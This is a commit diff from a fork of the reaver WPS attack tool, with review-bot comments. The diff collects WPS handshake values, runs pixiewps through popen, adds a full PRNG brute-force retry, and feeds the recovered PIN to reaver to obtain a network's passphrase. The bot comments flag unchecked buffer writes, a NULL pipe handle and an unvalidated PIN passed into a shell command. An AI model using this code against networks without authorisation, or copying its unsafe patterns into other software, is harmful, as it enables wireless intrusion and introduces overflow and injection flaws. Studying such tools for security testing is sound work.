Improved code, updating to use -f option of pixiewps
t6x committed May 5, 2015
1 parent 714fdcf commit a28b0af
Showing 7 changed files with 114 additions and 88 deletions.
4 changes: 2 additions & 2 deletions src/argsparser.c
@@ -92,11 +92,11 @@ int process_arguments(int argc, char **argv)
switch(c)
{
case 'W':
//set valor para auto get pass
//set default pin generator
set_op_gen_pin(atoi(optarg));
break;
case '0':
//set valor para auto get pass
//set stop in m1
set_stop_in_m1(1);
break;
case 'Z':
11 changes: 6 additions & 5 deletions src/globule.h
@@ -142,11 +142,12 @@ struct globals
* function calls.
*/

int op_pixie; /*make pixiewps*/
char cmd_reaver_test[4000]; /*auto reaver with pin */
int op_autopass; /*auto reaver with pin*/
int stop_in_m1;
int op_gen_pin;
int op_pixie; /* make pixiewps */
char cmd_reaver_test[4000]; /* auto reaver with pin */
int op_autopass; /* auto reaver with pin */
int stop_in_m1; /* stop reaver in m1 message */
int op_gen_pin; /* gen default pin */


} *globule;

10 changes: 9 additions & 1 deletion src/wps/t6.h
@@ -4,6 +4,14 @@ char cmd_pixie_aux[4000];
char pixie_buf_aux[4000];
char pixie_buf_aux2[4000];


//fixed size
char pixie_pke[1000]; /* save pke */
char pixie_pkr[1000]; /* save pkr */
char pixie_enonce[100]; /* save e-nonce */
char pixie_rnonce[100]; /* save r-nonce */
char pixie_authkey[100]; /* save AuthKey */
char pixie_ehash1[100]; /* save e-hash1 */
char pixie_ehash2[100]; /* save e-hash2 */

//int op_pixie=0;
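Review bot: The seven new buffers are sized with bare literals (`1000`, `100`) that are not tied to the length of the data later written into them. The writers in wps_common.c and wps_registrar.c append three characters per byte with unchecked `strcat`, so a value of `WPS_AUTHKEY_LEN` or `WPS_HASH_LEN` bytes needs `3 * len` characters including the terminator; if those constants are 32 (their definitions are not on this page), that is 96 of the 100 available. Deriving the sizes from the constants, e.g. `char pixie_authkey[WPS_AUTHKEY_LEN * 3];` and `char pixie_pke[192 * 3];`, keeps them correct if a length ever changes. These are also definitions rather than declarations, so every file that includes t6.h defines the same objects; `extern` declarations here with one definition in a single .c file would avoid depending on common-symbol linking.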

19 changes: 5 additions & 14 deletions src/wps/wps_attr_build.c
@@ -62,28 +62,19 @@ int wps_build_public_key(struct wps_data *wps, struct wpabuf *msg)
wpabuf_free(wps->dh_pubkey_r);
wps->dh_pubkey_r = pubkey;

if(globule->op_pixie==1 || globule->op_pixie==2 || globule->op_pixie==3)
{
strcat(cmd_pixie," -r ");
}

unsigned char *v;
v = wpabuf_mhead_u8(pubkey);

memset(pixie_pkr,0,sizeof(pixie_pkr));
printf("[P] PKR: ");
int pixiecnt = 0;
for (; pixiecnt < 192; pixiecnt++) {
printf("%02x", v[pixiecnt]);
if(globule->op_pixie==1 || globule->op_pixie==2 || globule->op_pixie==3)
{
sprintf(cmd_pixie_aux, "%02x", v[pixiecnt]);
strcat(cmd_pixie,cmd_pixie_aux);
}
sprintf(cmd_pixie_aux, "%02x", v[pixiecnt]);
strcat(pixie_pkr, cmd_pixie_aux);
if (pixiecnt != 191) {
printf(":");
if(globule->op_pixie==1 || globule->op_pixie==2 || globule->op_pixie==3)
{
strcat(cmd_pixie,":");
}
strcat(pixie_pkr,":");
}
}
printf("\n");
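Review bot: The new formatting path in wps_build_public_key fills `pixie_pkr` with `sprintf` into `cmd_pixie_aux` followed by `strcat`, and nothing compares the running length with `sizeof(pixie_pkr)`; the same loop is repeated for `pixie_authkey` in wps_derive_keys (wps_common.c) and for `pixie_enonce`, `pixie_ehash1`, `pixie_ehash2` and `pixie_pke` in wps_registrar.c. The loop also reads a fixed 192 bytes from `v` without checking the length of `pubkey`; presumably the key is padded to that size earlier in the function, which starts outside the visible lines. One bounded helper built on `snprintf` and called from all six sites would remove the duplication and turn an undersized destination into an error return instead of an overflow. Since the callers live in three files, the helper would need to be shared through a header or a common .c file.

```c
/* Format n bytes of src as "aa:bb:..." into dst; returns 0, or -1 if dst is too small. */
static int pixie_hex(char *dst, size_t dst_len, const unsigned char *src, size_t n)
{
	size_t off = 0;

	if (dst_len == 0)
		return -1;
	dst[0] = '\0';
	for (size_t i = 0; i < n; i++) {
		int w = snprintf(dst + off, dst_len - off, "%s%02x", i ? ":" : "", src[i]);
		if (w < 0 || (size_t)w >= dst_len - off)
			return -1;
		off += (size_t)w;
	}
	return 0;
}

/* … unchanged: printf of "[P] PKR: " and the per-byte print loop … */
if (pixie_hex(pixie_pkr, sizeof(pixie_pkr), v, 192) < 0)
	return -1;
```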
7 changes: 4 additions & 3 deletions src/wps/wps_common.c
@@ -129,16 +129,17 @@ int wps_derive_keys(struct wps_data *wps)
wpa_hexdump_key(MSG_DEBUG, "WPS: EMSK", wps->emsk, WPS_EMSK_LEN);

/****** ADD THIS PART ******/
strcat(cmd_pixie," -a ");

memset(pixie_authkey,0,sizeof(pixie_authkey));
printf("[P] AuthKey: ");
int pixiecnt = 0;
for (; pixiecnt < WPS_AUTHKEY_LEN; pixiecnt++) {
printf("%02x", wps->authkey[pixiecnt]);
sprintf(cmd_pixie_aux, "%02x", wps->authkey[pixiecnt]);
strcat(cmd_pixie,cmd_pixie_aux);
strcat(pixie_authkey, cmd_pixie_aux);
if (pixiecnt != WPS_AUTHKEY_LEN - 1) {
printf(":");
strcat(cmd_pixie,":");
strcat(pixie_authkey,":");
}
}
printf("\n");
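--- a/src/wps/wps_enrollee.c
+++ b/src/wps/wps_enrollee.c
@@ -545,26 +545,6 @@ printf("------------------------------------------------------------------------
 if (wps_derive_keys(wps) < 0)
 return -1;
 
-
-/****** ADD THIS PART ******/
-
-
-printf("[P] PKR: ");
-int pixiecnt = 0;
-for (; pixiecnt < 192; pixiecnt++) {
-printf("%02x", pk[pixiecnt]);
-if (pixiecnt != 191) {
-printf(":");
-}
-}
-printf("\n");
-/******/
-
-
-
-
-
-
 return 0;
 }
 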
131 changes: 88 additions & 43 deletions src/wps/wps_registrar.c
@@ -1712,30 +1712,19 @@ static int wps_process_enrollee_nonce(struct wps_data *wps, const u8 *e_nonce)
wps->nonce_e, WPS_NONCE_LEN);

/****** ADD THIS PART ******/
memset(cmd_pixie,0,sizeof(cmd_pixie));
memset(cmd_pixie_aux,0,sizeof(cmd_pixie_aux));
strcat(cmd_pixie,"pixiewps ");

if(globule->op_pixie==1 || globule->op_pixie==2 || globule->op_pixie==3)
{
strcat(cmd_pixie," -n ");
}
memset(pixie_enonce,0,sizeof(pixie_enonce));

printf("[P] E-Nonce: ");
int pixiecnt = 0;
for (; pixiecnt < WPS_NONCE_LEN; pixiecnt++)
{
printf("%02x", wps->nonce_e[pixiecnt]);
if(globule->op_pixie==1 || globule->op_pixie==2 || globule->op_pixie==3)
{
sprintf(cmd_pixie_aux, "%02x", wps->nonce_e[pixiecnt]);
strcat(cmd_pixie,cmd_pixie_aux);
}
sprintf(cmd_pixie_aux, "%02x", wps->nonce_e[pixiecnt]);
strcat(pixie_enonce, cmd_pixie_aux);
if (pixiecnt != WPS_NONCE_LEN - 1) {
printf(":");
if(globule->op_pixie==1 || globule->op_pixie==2 || globule->op_pixie==3)
{
strcat(cmd_pixie,":");
}
strcat(pixie_enonce,":");
}
}
printf("\n");
@@ -1799,16 +1788,16 @@ static int wps_process_e_hash1(struct wps_data *wps, const u8 *e_hash1)
wpa_hexdump(MSG_DEBUG, "WPS: E-Hash1", wps->peer_hash1, WPS_HASH_LEN);

/****** ADD THIS PART ******/
strcat(cmd_pixie," -s ");
memset(pixie_ehash1,0,sizeof(pixie_ehash1));
printf("[P] E-Hash1: ");
int pixiecnt = 0;
for (; pixiecnt < WPS_HASH_LEN; pixiecnt++) {
printf("%02x", wps->peer_hash1[pixiecnt]);
sprintf(cmd_pixie_aux, "%02x", wps->peer_hash1[pixiecnt]);
strcat(cmd_pixie,cmd_pixie_aux);
strcat(pixie_ehash1, cmd_pixie_aux);
if (pixiecnt != WPS_HASH_LEN - 1) {
printf(":");
strcat(cmd_pixie,":");
strcat(pixie_ehash1,":");
}
}
printf("\n");
@@ -1830,35 +1819,47 @@ static int wps_process_e_hash2(struct wps_data *wps, const u8 *e_hash2)
wpa_hexdump(MSG_DEBUG, "WPS: E-Hash2", wps->peer_hash2, WPS_HASH_LEN);

/****** ADD THIS PART ******/
strcat(cmd_pixie," -z ");
memset(pixie_ehash2,0,sizeof(pixie_ehash2));
printf("[P] E-Hash2: ");
int pixiecnt = 0;
for (; pixiecnt < WPS_HASH_LEN; pixiecnt++) {
printf("%02x", wps->peer_hash2[pixiecnt]);
sprintf(cmd_pixie_aux, "%02x", wps->peer_hash2[pixiecnt]);
strcat(cmd_pixie,cmd_pixie_aux);
strcat(pixie_ehash2, cmd_pixie_aux);
if (pixiecnt != WPS_HASH_LEN - 1) {
printf(":");
strcat(cmd_pixie,":");
strcat(pixie_ehash2,":");
}
}
printf("\n");
/******/

memset(cmd_pixie,0,sizeof(cmd_pixie));

strcat(cmd_pixie,"pixiewps -e ");
strcat(cmd_pixie,pixie_pke);
strcat(cmd_pixie," -r ");
strcat(cmd_pixie,pixie_pkr);
strcat(cmd_pixie," -s ");
strcat(cmd_pixie,pixie_ehash1);
strcat(cmd_pixie," -z ");
strcat(cmd_pixie,pixie_ehash2);
strcat(cmd_pixie," -a ");
strcat(cmd_pixie,pixie_authkey);
strcat(cmd_pixie," -n ");
strcat(cmd_pixie,pixie_enonce);


if(globule->op_pixie==1 || globule->op_pixie==2 || globule->op_pixie==3){
//strcat(cmd_pixie," -S ");
strcat(cmd_pixie," ");
if(globule->dh_small == 1){
strcat(cmd_pixie," -S ");
}
//sprintf(cmd_pixie,"%s -S",cmd_pixie);



if(globule->op_pixie==1 || globule->op_pixie==2 || globule->op_pixie==3)
{

FILE *fpixe;

//printf(" -- cmd pixie : %s",cmd_pixie);

if ((fpixe = popen(cmd_pixie, "r")) == NULL) {
printf("Error opening pipe!\n");
//return -1;
@@ -1869,6 +1870,9 @@ static int wps_process_e_hash2(struct wps_data *wps, const u8 *e_hash2)
char *aux_pixie_pin;

memset(pixie_pin, 0, sizeof(pixie_pin));

printf("[+] Running pixiewps with the information, wait ...\n");
//printf("Cmd : %s\n",cmd_pixie);

while (fgets(pixie_buf_aux, 4000, fpixe) != NULL)
{
@@ -1897,15 +1901,60 @@ static int wps_process_e_hash2(struct wps_data *wps, const u8 *e_hash2)
//printf("Command not found or exited with error status\n");
//return -1;
}


if(pixie_test == 0)
{
//Pin not found, trying -f (full PRNG brute force)

strcat(cmd_pixie," -f ");

printf("[+] Pin not found, trying -f (full PRNG brute force), this may take around 30 minutes\n");
//printf("Cmd : %s\n",cmd_pixie);

if ((fpixe = popen(cmd_pixie, "r")) == NULL) {
printf("Error opening pipe!\n");
//return -1;
}

while (fgets(pixie_buf_aux, 4000, fpixe) != NULL)
{

printf("[Pixie-Dust] %s", pixie_buf_aux);

aux_pixie_pin = strstr(pixie_buf_aux,"WPS pin not found");
if(aux_pixie_pin != NULL)
{
pixie_test = 0;
//exit(0);
}

aux_pixie_pin = strstr(pixie_buf_aux,"WPS pin:");
if(aux_pixie_pin != NULL)
{
pixie_test = 1;
//exit(0);
//here will get the pin
strncpy(pixie_pin, aux_pixie_pin + 12, 8);
}

}

if(pclose(fpixe)) {
//printf("Command not found or exited with error status\n");
//return -1;
}



}


if((pixie_test == 1) && (globule->op_autopass==1))
{
//here will make the test to get pass

FILE *fpixe_test;

//strcat(globule->cmd_reaver_test," -p ");
//strcat(globule->cmd_reaver_test,pixie_pin);

char cmd_reaver_test_aux[4000];
char cmd_buf_c[5];
@@ -1935,8 +1984,8 @@ static int wps_process_e_hash2(struct wps_data *wps, const u8 *e_hash2)

printf("Running reaver with the correct pin, wait ...\n");
printf("Cmd : %s\n\n",cmd_reaver_test_aux);
printf("[Reaver Test] BSSID: %s\n", mac2str(get_bssid(),':'));
printf("[Reaver Test] Channel: %s\n", cmd_buf_c);
printf("[Reaver Test] [+] BSSID: %s\n", mac2str(get_bssid(),':'));
printf("[Reaver Test] [+] Channel: %s\n", cmd_buf_c);
//printf("Command : \n", globule->cmd_reaver_test);
while (fgets(pixie_buf_aux2, 4000, fpixe_test) != NULL)
{
@@ -1970,9 +2019,6 @@ static int wps_process_e_hash2(struct wps_data *wps, const u8 *e_hash2)

}

//printf(" %s ",cmd_pixie);


return 0;
}

@@ -2106,24 +2152,23 @@ static int wps_process_pubkey(struct wps_data *wps, const u8 *pk,
return -1;

/****** ADD THIS PART ******/
// memset (cmd_pixie,0,sizeof(cmd_pixie));
strcat(cmd_pixie," -e ");
//sprintf( cmd_pixie, "", cmd_pixie, str2);


memset(pixie_pke,0,sizeof(pixie_pke));
printf("[P] PKE: ");
int pixiecnt = 0;
for (; pixiecnt < 192; pixiecnt++) {
printf("%02x", pk[pixiecnt]);
sprintf(cmd_pixie_aux, "%02x", pk[pixiecnt]);
strcat(cmd_pixie,cmd_pixie_aux);
strcat(pixie_pke, cmd_pixie_aux);
if (pixiecnt != 191) {
printf(":");
strcat(cmd_pixie,":");
strcat(pixie_pke,":");
}
}
printf("\n");
/******/


return 0;
}
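Review bot: In the added `-f` retry block of wps_process_e_hash2, a failed `popen` only prints "Error opening pipe!" and execution continues into `fgets(pixie_buf_aux, 4000, fpixe)` and `pclose(fpixe)` with `fpixe == NULL`, which is undefined behaviour. Guard the read loop and the close, e.g. `if ((fpixe = popen(cmd_pixie, "r")) != NULL) { ... pclose(fpixe); }`; the first pixiewps run above it, visible as context, has the same gap. The retry also copies the PIN with `strncpy(pixie_pin, aux_pixie_pin + 12, 8)` without checking that the matched line is at least 20 characters long or that the eight characters are digits, so a short or differently formatted line yields stale bytes from `pixie_buf_aux`; because `pixie_pin` appears to feed the command that is later run through `popen` (that code lies between hunks, so this is inferred), it should be validated before use. The block repeats the first run's parsing loop almost line for line and would be easier to keep correct as one helper that takes the command string.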
